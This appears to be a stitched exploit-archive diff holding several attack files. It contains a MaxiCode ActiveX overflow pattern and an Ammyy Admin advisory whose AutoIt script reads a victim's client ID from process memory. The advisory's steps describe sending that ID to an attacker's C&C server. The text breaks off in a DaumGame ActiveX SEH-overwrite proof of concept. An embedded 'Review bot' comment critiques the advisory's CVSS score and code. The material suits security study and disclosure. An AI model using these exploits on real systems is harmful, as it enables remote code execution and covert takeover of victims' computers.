Minor Version : 0
Build Number : 0
Revision Number : 1
Product Version : 4, 0, 0, 1
Product Name : MaxiCode Module
Company Name :
Legal Copyright : Copyright 2009
Comments :
File Description : MaxiCode ActiveX
File Version : 4, 0, 0, 1
Internal Name : MaxiCode ActiveX
Legal Trademarks :
Private Build :
Special Build :
Language : not found
*******************************************************************************
-->
<object id=TestObj classid="CLSID:{2355C601-37D1-42B4-BEB1-03C773298DC8}" style="width:100;height:350">
<PARAM NAME="Data" VALUE="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9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">
</object>

platforms/windows/local/31182.txt Executable file

@ -0,0 +1,510 @@
Title:
====
Ammyy Admin - Hidden hard-coded option and Access Control vulnerability.
Credit:
======
Name: Bhadresh Patel
Company/affiliation: Cyberoam Technologies Private Limited
Website: www.cyberoam.com
CVE:
====
- CVE-2013-5581 for hidden hard-coded option (CWE-255).
- CVE-2013-5582 for failure to enforce access restrictions for resources (CWE-264).
Date:
====
17-01-2014
CL-ID:
====
CRD-2013-04
Vendor:
======
Ammyy is in to developing cutting edge internet solutions. They have researched informational technologies and automation management of remote computer access services for many years. The result of their efforts is new Remote Access system "Ammyy Admin".
Product:
=======
Ammyy Admin is the easiest way to establish remote desktop connection. You can easily share a remote desktop or control a server over the Internet with Ammyy Admin.
No matter where you are, Ammyy Admin makes it safe and easy to quickly access a remote desktop within a few seconds.
Ammyy Admin is trusted by more than 21 000 000 personal and corporate users.
Product link: http://www.ammyy.com/en/downloads.html
Abstract:
=======
Cyberoam Threat Research Labs discovered Hidden option and Access Control vulnerability in Ammyy Admin tool.
Report-Timeline (DD-MM-YYYY):
====================
12-08-2013: Vendor notification
13-08-2013: Vendor Response/Feedback
13-12-2013: Vendor Fix/Patch
17-01-2014: Public or Non-Public Disclosure
Affected Version:
=============
Version (<=3.2)
Exploitation-Technique:
===================
Local
Severity Rating:
===================
CVSS Base Score 7.2 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
Details:
=======
There is a Hidden option and Access Control vulnerability in Ammyy Admin tool which allows an attacker to utilize "Ammyy Admin tool" as a trojan horse to access computer without victim's information.
An approach to have hidden option "-nogui" along with storing "client ID" at fixed memory location could be exploited by an attacker to use "Ammyy Admin" as a trojan horse.
Proof Of Concept:
================
An attacker could exploit above vulnerabilities using following steps,
1) Create custom settings.rdp and settings3.bin to allow access to any "computer ID" with predefined password.
2) Use hidden option "-nogui" to run "Ammyy Amin" without the user information.
2) Acquire the client id by reading memory location "004A3658".
3) Send client id to attackers C&C server.
-------- Logs -------
###### Hidden hard-coded option (CVE-2013-5581) ######
root@bhdresh:~# strings AA_v3.2.exe | grep -i ^"-"
-f=*
- 5H
-connect
-set_proxy_
-dosas_
-elevated
-log
-lunch
-nogui
-service
-debug
-remove
-install
-outid
-setsettings
-rstid
-showversion
-notstartclient
-startclient
-minimize
-+/3
#### client ID at Fixed memory location (CVE-2013-5582) ####
=======PoC screenshot=======
http://oi42.tinypic.com/34owtoy.jpg
=======PoC autoit code to hijack client ID=======
Func _memoryopen($iv_pid, $iv_desiredaccess = 2035711, $iv_inherithandle = 1)
If NOT ProcessExists($iv_pid) Then
SetError(1)
Return 0
EndIf
Local $ah_handle[2] = [DllOpen("kernel32.dll")]
If @error Then
SetError(2)
Return 0
EndIf
Local $av_openprocess = DllCall($ah_handle[0], "int", "OpenProcess", "int", $iv_desiredaccess, "int", $iv_inherithandle, "int", $iv_pid)
If @error Then
DllClose($ah_handle[0])
SetError(3)
Return 0
EndIf
$ah_handle[1] = $av_openprocess[0]
Return $ah_handle
EndFunc
Func _memoryread($iv_address, $ah_handle, $sv_type = "dword")
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
Local $v_buffer = DllStructCreate($sv_type)
If @error Then
SetError(@error + 1)
Return 0
EndIf
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If NOT @error Then
Local $v_value = DllStructGetData($v_buffer, 1)
Return $v_value
Else
SetError(6)
Return 0
EndIf
EndFunc
Func _memorywrite($iv_address, $ah_handle, $v_data, $sv_type = "dword")
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
Local $v_buffer = DllStructCreate($sv_type)
If @error Then
SetError(@error + 1)
Return 0
Else
DllStructSetData($v_buffer, 1, $v_data)
If @error Then
SetError(6)
Return 0
EndIf
EndIf
DllCall($ah_handle[0], "int", "WriteProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If NOT @error Then
Return 1
Else
SetError(7)
Return 0
EndIf
EndFunc
Func _memoryclose($ah_handle)
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
DllCall($ah_handle[0], "int", "CloseHandle", "int", $ah_handle[1])
If NOT @error Then
DllClose($ah_handle[0])
Return 1
Else
DllClose($ah_handle[0])
SetError(2)
Return 0
EndIf
EndFunc
Func setprivilege($privilege, $benable)
Const $token_adjust_privileges = 32
Const $token_query = 8
Const $se_privilege_enabled = 2
Local $htoken, $sp_auxret, $sp_ret, $hcurrprocess, $ntokens, $ntokenindex, $priv
$ntokens = 1
$luid = DllStructCreate("dword;int")
If IsArray($privilege) Then $ntokens = UBound($privilege)
$token_privileges = DllStructCreate("dword;dword[" & (3 * $ntokens) & "]")
$newtoken_privileges = DllStructCreate("dword;dword[" & (3 * $ntokens) & "]")
$hcurrprocess = DllCall("kernel32.dll", "hwnd", "GetCurrentProcess")
$sp_auxret = DllCall("advapi32.dll", "int", "OpenProcessToken", "hwnd", $hcurrprocess[0], "int", BitOR($token_adjust_privileges, $token_query), "int*", 0)
If $sp_auxret[0] Then
$htoken = $sp_auxret[3]
DllStructSetData($token_privileges, 1, 1)
$ntokenindex = 1
While $ntokenindex <= $ntokens
If IsArray($privilege) Then
$priv = $privilege[$ntokenindex - 1]
Else
$priv = $privilege
EndIf
$ret = DllCall("advapi32.dll", "int", "LookupPrivilegeValue", "str", "", "str", $priv, "ptr", DllStructGetPtr($luid))
If $ret[0] Then
If $benable Then
DllStructSetData($token_privileges, 2, $se_privilege_enabled, (3 * $ntokenindex))
Else
DllStructSetData($token_privileges, 2, 0, (3 * $ntokenindex))
EndIf
DllStructSetData($token_privileges, 2, DllStructGetData($luid, 1), (3 * ($ntokenindex - 1)) + 1)
DllStructSetData($token_privileges, 2, DllStructGetData($luid, 2), (3 * ($ntokenindex - 1)) + 2)
DllStructSetData($luid, 1, 0)
DllStructSetData($luid, 2, 0)
EndIf
$ntokenindex += 1
WEnd
$ret = DllCall("advapi32.dll", "int", "AdjustTokenPrivileges", "hwnd", $htoken, "int", 0, "ptr", DllStructGetPtr($token_privileges), "int", DllStructGetSize($newtoken_privileges), "ptr", DllStructGetPtr($newtoken_privileges), "int*", 0)
$f = DllCall("kernel32.dll", "int", "GetLastError")
EndIf
$newtoken_privileges = 0
$token_privileges = 0
$luid = 0
If $sp_auxret[0] = 0 Then Return 0
$sp_auxret = DllCall("kernel32.dll", "int", "CloseHandle", "hwnd", $htoken)
If NOT $ret[0] AND NOT $sp_auxret[0] Then Return 0
Return $ret[0]
EndFunc
Func _memorypointerread($iv_address, $ah_handle, $av_offset, $sv_type = "dword")
If IsArray($av_offset) Then
If IsArray($ah_handle) Then
Local $iv_pointercount = UBound($av_offset) - 1
Else
SetError(2)
Return 0
EndIf
Else
SetError(1)
Return 0
EndIf
Local $iv_data[2], $i
Local $v_buffer = DllStructCreate("dword")
For $i = 0 To $iv_pointercount
If $i = $iv_pointercount Then
$v_buffer = DllStructCreate($sv_type)
If @error Then
SetError(@error + 2)
Return 0
EndIf
$iv_address = "0x" & Hex($iv_data[1] + $av_offset[$i])
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(7)
Return 0
EndIf
$iv_data[1] = DllStructGetData($v_buffer, 1)
ElseIf $i = 0 Then
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(7)
Return 0
EndIf
$iv_data[1] = DllStructGetData($v_buffer, 1)
Else
$iv_address = "0x" & Hex($iv_data[1] + $av_offset[$i])
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(7)
Return 0
EndIf
$iv_data[1] = DllStructGetData($v_buffer, 1)
EndIf
Next
$iv_data[0] = $iv_address
Return $iv_data
EndFunc
Func _memorypointerwrite($iv_address, $ah_handle, $av_offset, $v_data, $sv_type = "dword")
If IsArray($av_offset) Then
If IsArray($ah_handle) Then
Local $iv_pointercount = UBound($av_offset) - 1
Else
SetError(2)
Return 0
EndIf
Else
SetError(1)
Return 0
EndIf
Local $iv_structdata, $i
Local $v_buffer = DllStructCreate("dword")
For $i = 0 To $iv_pointercount
If $i = $iv_pointercount Then
$v_buffer = DllStructCreate($sv_type)
If @error Then
SetError(@error + 3)
Return 0
EndIf
DllStructSetData($v_buffer, 1, $v_data)
If @error Then
SetError(8)
Return 0
EndIf
$iv_address = "0x" & Hex($iv_structdata + $av_offset[$i])
DllCall($ah_handle[0], "int", "WriteProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(9)
Return 0
Else
Return $iv_address
EndIf
ElseIf $i = 0 Then
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(3)
Return 0
EndIf
$iv_structdata = DllStructGetData($v_buffer, 1)
Else
$iv_address = "0x" & Hex($iv_structdata + $av_offset[$i])
DllCall($ah_handle[0], "int", "ReadProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If @error Then
SetError(3)
Return 0
EndIf
$iv_structdata = DllStructGetData($v_buffer, 1)
EndIf
Next
EndFunc
Func _memorygetbaseaddress($ah_handle, $ihexdec = 0)
Local $iv_address = 1048576
Local $v_buffer = DllStructCreate("dword;dword;dword;dword;dword;dword;dword")
Local $vdata
Local $vtype
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
DllCall($ah_handle[0], "int", "VirtualQueryEx", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer))
If NOT @error Then
$vdata = Hex(DllStructGetData($v_buffer, 2))
$vtype = Hex(DllStructGetData($v_buffer, 3))
While $vtype <> "00000080"
DllCall($ah_handle[0], "int", "VirtualQueryEx", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer))
$vdata = Hex(DllStructGetData($v_buffer, 2))
$vtype = Hex(DllStructGetData($v_buffer, 3))
If Hex($iv_address) = "01000000" Then ExitLoop
$iv_address += 65536
WEnd
If $vtype = "00000080" Then
SetError(0)
If $ihexdec = 1 Then
Return Dec($vdata)
Else
Return $vdata
EndIf
Else
SetError(2)
Return 0
EndIf
Else
SetError(3)
Return 0
EndIf
EndFunc
Func _memorymodulegetbaseaddress($ipid, $smodule)
If NOT ProcessExists($ipid) Then Return SetError(1, 0, 0)
If NOT IsString($smodule) Then Return SetError(2, 0, 0)
Local $psapi = DllOpen("psapi.dll")
Local $hprocess
Local $permission = BitOR(2, 1024, 8, 16, 32)
If $ipid > 0 Then
Local $hprocess = DllCall("kernel32.dll", "ptr", "OpenProcess", "dword", $permission, "int", 0, "dword", $ipid)
If $hprocess[0] Then
$hprocess = $hprocess[0]
EndIf
EndIf
Local $modules = DllStructCreate("ptr[1024]")
Local $acall = DllCall($psapi, "int", "EnumProcessModules", "ptr", $hprocess, "ptr", DllStructGetPtr($modules), "dword", DllStructGetSize($modules), "dword*", 0)
If $acall[4] > 0 Then
Local $imodnum = $acall[4] / 4
Local $atemp
For $i = 1 To $imodnum
$atemp = DllCall($psapi, "dword", "GetModuleBaseNameW", "ptr", $hprocess, "ptr", Ptr(DllStructGetData($modules, 1, $i)), "wstr", "", "dword", 260)
If $atemp[3] = $smodule Then
DllClose($psapi)
Return Ptr(DllStructGetData($modules, 1, $i))
EndIf
Next
EndIf
DllClose($psapi)
Return SetError(-1, 0, 0)
EndFunc
#EndRegion
Func _memreaddll($dll, $offset, $ah_handle, $sv_type = "dword")
$staticoffset = Dec($offset)
$baseaddr = _memorymodulegetbaseaddress($ah_handle, $dll)
$finaladdr = "0x" & Hex($baseaddr + $staticoffset)
$memtest = _memoryread($finaladdr, $ah_handle, $sv_type)
Return $memtest
EndFunc
Func _memwritedll($dll, $offset, $value, $ah_handle, $sv_type = "dword")
$staticoffset = Dec($offset)
$baseaddr = _memorymodulegetbaseaddress($ah_handle, $dll)
$finaladdr = "0x" & Hex($baseaddr + $staticoffset)
$memtest = _memorywrite($finaladdr, $ah_handle, $value, $sv_type)
Return $memtest
EndFunc
Func _memwritedllbytearray($dll, $offset, $ah_handle, $v_array)
Local $staticoffset = Dec($offset)
Local $baseaddr = _memorymodulegetbaseaddress($ah_handle, $dll)
Local $finaladdr = "0x" & Hex($baseaddr + $staticoffset)
Local $memtest = _memorywritebytearray($finaladdr, $ah_handle, $v_array)
Return $memtest
EndFunc
Func _memorywritebytearray($iv_address, $ah_handle, $v_array)
If NOT IsArray($ah_handle) Then
SetError(1)
Return 0
EndIf
If NOT IsArray($v_array) Then
Return 0
EndIf
Local $emax = UBound($v_array)
Local $bytestring = ""
For $i = 0 To $emax - 1
$bytestring = $bytestring & "byte;"
Next
Local $v_buffer = DllStructCreate($bytestring)
If @error Then
Return 0
Else
For $i = 1 To $emax
DllStructSetData($v_buffer, $i, $v_array[$i - 1])
If @error Then
Return 0
EndIf
Next
EndIf
DllCall($ah_handle[0], "int", "WriteProcessMemory", "int", $ah_handle[1], "int", $iv_address, "ptr", DllStructGetPtr($v_buffer), "int", DllStructGetSize($v_buffer), "int", "")
If NOT @error Then
Return 1
Else
SetError(7)
Return 0
EndIf
EndFunc
FileChangeDir(@TempDir)
FileDelete("id")
$id = ProcessExists("AAv3.exe")
Local $file = FileOpen("id", 1)
$memoryopen = _memoryopen($id)
While 1
$mem_read1 = _memoryread("0x" & "004A3658", $memoryopen)
If NOT $mem_read1 = "" Then
MsgBox(0, "Cyberoam Threat Research Labs", $mem_read1)
FileWrite($file, $mem_read1)
ExitLoop
EndIf
Sleep(100)
WEnd
_memoryclose($memoryopen)
==========================================
--------------------------
Caveats / Prerequisites:
======================
The attacker needs to entice victims to perform an action in order to exploit this vulnerability.
Risk:
=====
The security risk of Hidden option and Access Control vulnerability is estimated as High.
Credits:
=======
Cyberoam Threat Research Labs - Bhadresh Patel
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Any modified copy or reproduction, including partially usages, of this file requires authorization from Cyberoam Threat Research Labs. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Cyberoam Threat Research Labs.
The first attempt at contact will be through any appropriate contacts or formal mechanisms listed on the vendor Web site, or by sending an e-mail with the pertinent information about the vulnerability. Simultaneous with the vendor being notified, Cyberoam may distribute vulnerability protection filters to its customers' IPS devices through the IPS upgrades.
If a vendor fails to respond after five business days, Cyberoam Threat Research Labs may issue a public advisory disclosing its findings fifteen business days after the initial contact.
If a vendor response is received within the timeframe outlined above, Cyberoam Threat Research Labs will allow the vendor 6-months to address the vulnerability with a patch. At the end of the deadline if a vendor is not responsive or unable to provide a reasonable statement as to why the vulnerability is not fixed, the Cyberoam Threat Research Labs will publish a limited advisory to enable the defensive community to protect the user. We believe that by doing so the vendor will understand the responsibility they have to their customers and will react appropriately.
Cyberoam Threat Research Labs will make every effort to work with vendors to ensure they understand the technical details and severity of a reported security flaw. If a product vendor is unable to, or chooses not to, patch a particular security flaw, Cyberoam Threat Research Labs will offer to work with that vendor to publicly disclose the flaw with some effective workarounds.
Before public disclosure of a vulnerability, Cyberoam Threat Research Labs may share technical details of the vulnerability with other security vendors who are in a position to provide a protective response to a broader user base.
-------------------------------------------------------------------------------------------------------
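Review bot: the severity block in this advisory does not add up. The vector on the line `CVSS Base Score 7.2 (AV:N/AC:M/Au:N/C:N/I:N/A:P)` scores 4.3 under CVSS v2 and declares no confidentiality or integrity impact, which contradicts both the Details section (an attacker gains access to the victim's computer) and the `Exploitation-Technique: Local` field (AV:N means network). Please reconcile the vector with the stated 7.2 and with the local/remote classification. Smaller points in the same file: the Proof Of Concept steps are numbered 1, 2, 2, 3; `_memreaddll`, `_memwritedll` and `_memwritedllbytearray` call `_memorymodulegetbaseaddress($ah_handle, $dll)` although that function declares its first parameter as a PID and guards it with `ProcessExists($ipid)`, so the three helpers always fail with error 1 (they are unused by the script body, which calls `_memoryread` on the fixed address directly, so they can go, together with the stray `#EndRegion` that has no matching `#Region`); and `If NOT $mem_read1 = ""` relies on NOT binding tighter than `=` in AutoIt, where `If $mem_read1 <> 0 Then` states the intent directly. Finally, the timeline records a vendor fix on 13-12-2013 but the advisory never names the fixed version; readers who want to verify remediation beyond `Affected Version (<=3.2)` need it.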

@ -0,0 +1,133 @@
<!--
Trustwave SpiderLabs Security Advisory TWSL2014-002:
Buffer Overflow Vulnerability in DaumGame ActiveX
Published: 01/07/2014
Version: 1.1
Vendor: Daum (daum.net)
Product: Daum Game ActiveX
Version affected: 1.1.0.5, 1.1.0.4
Product description:
DaumGame ActiveX of Daum Communications is a plugin that is required for
playing in Daum Game website.
Finding 1: ActiveX IconCreate SEH Overwrite Remote Code Execution
Credit: Daniel Chechik of Trustwave SpiderLabs
CVE: CVE-2013-7246
CWE: CWE-119
DaumGame ActiveX versions 1.1.0.5, 1.1.0.4 by Daum Communications includes
the vulnerable method "IconCreate" which is designed to support icon
process. The method which accepts printable characters suffers from buffer
overflow vulnerability that leads to SEH overwrite.
The following Proof of Concept (PoC) executes an harmless calculator. In
this PoC the SEH handler is overwritten with an address from 'msls31.dll'
in order to control EIP.
## daumgame.html
-->
<html>
<body>
<object name="activex2" classid="clsid:16B6A027-2732-4028-9303-EFE3E95EF766"> </object>
<script>
var overwrite = unescape("%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05